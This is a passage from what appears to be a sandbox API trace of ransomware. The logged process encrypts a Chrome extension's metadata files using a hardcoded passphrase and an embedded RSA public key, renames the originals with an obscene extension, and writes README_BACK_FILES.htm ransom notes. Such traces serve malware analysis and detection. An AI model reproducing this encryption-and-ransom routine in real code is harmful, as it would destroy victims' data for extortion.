KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----e", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.793] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0253.793] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x298d4d8) returned 1 [0253.793] CryptImportPublicKeyInfo (in: hCryptProv=0x298d4d8, dwCertEncodingType=0x1, pInfo=0x298ea80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298eab0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298eab8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x29846a0) returned 1 [0253.793] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0253.793] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d670*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x298d670*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0253.794] WriteFile (in: hFile=0x5d60, lpBuffer=0x298d670*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x298d670*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0253.795] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x160, lpOverlapped=0x0) returned 1 [0253.796] CryptEncrypt (in: hKey=0x2985a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x160, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x170) returned 1 [0253.796] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x170, lpOverlapped=0x0) returned 1 [0253.796] CloseHandle (hObject=0x5d50) returned 1 [0253.796] CloseHandle (hObject=0x5d60) returned 1 [0253.797] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), bFailIfExists=0) returned 1 [0253.800] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x0) returned 1 [0253.801] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.gsg")) returned 1 [0253.802] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.fuck")) returned 1 [0253.803] CryptDestroyHash (hHash=0x2938978) returned 1 [0253.803] CryptDestroyKey (hKey=0x2985a20) returned 1 [0253.803] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0253.803] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.803] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0253.804] GetLastError () returned 0x0 [0253.804] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json")) returned 0x20 [0253.804] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0253.805] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.805] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.806] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0253.807] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x298a040) returned 1 [0253.809] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0253.809] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0253.809] CryptHashData (hHash=0x2985a20, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.809] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2984fa0) returned 1 [0253.810] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----e", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.810] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0253.810] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2987538) returned 1 [0253.810] CryptImportPublicKeyInfo (in: hCryptProv=0x2987538, dwCertEncodingType=0x1, pInfo=0x298f920*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f950*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f958*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x28e88b8) returned 1 [0253.810] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0253.810] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29875c0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x29875c0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0253.810] WriteFile (in: hFile=0x5d50, lpBuffer=0x29875c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x29875c0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0253.812] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.819] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.819] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.873] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.874] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.874] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.874] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.874] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.874] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.874] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.874] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.874] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.874] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.874] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.874] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.875] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.875] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.875] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.875] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.875] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.876] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.876] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.876] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.876] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.876] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.876] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.876] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.876] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0253.876] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0253.876] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x156, lpOverlapped=0x0) returned 1 [0253.876] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x156, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x160) returned 1 [0253.876] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x160, lpOverlapped=0x0) returned 1 [0253.876] CloseHandle (hObject=0x5d60) returned 1 [0253.877] CloseHandle (hObject=0x5d50) returned 1 [0253.877] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0253.880] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0253.881] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0253.882] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0253.883] CryptDestroyHash (hHash=0x2985a20) returned 1 [0253.883] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.883] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0253.884] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0253.884] FindClose (in: hFindFile=0x29387b8 | out: hFindFile=0x29387b8) returned 1 [0253.884] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0253.884] AreFileApisANSI () returned 1 [0253.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0253.884] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0253.885] GetFileType (hFile=0x5d64) returned 0x1 [0253.885] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0253.887] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0253.887] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0253.887] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\readme_back_files.htm")) returned 0xffffffff [0253.887] AreFileApisANSI () returned 1 [0253.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x299b1e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 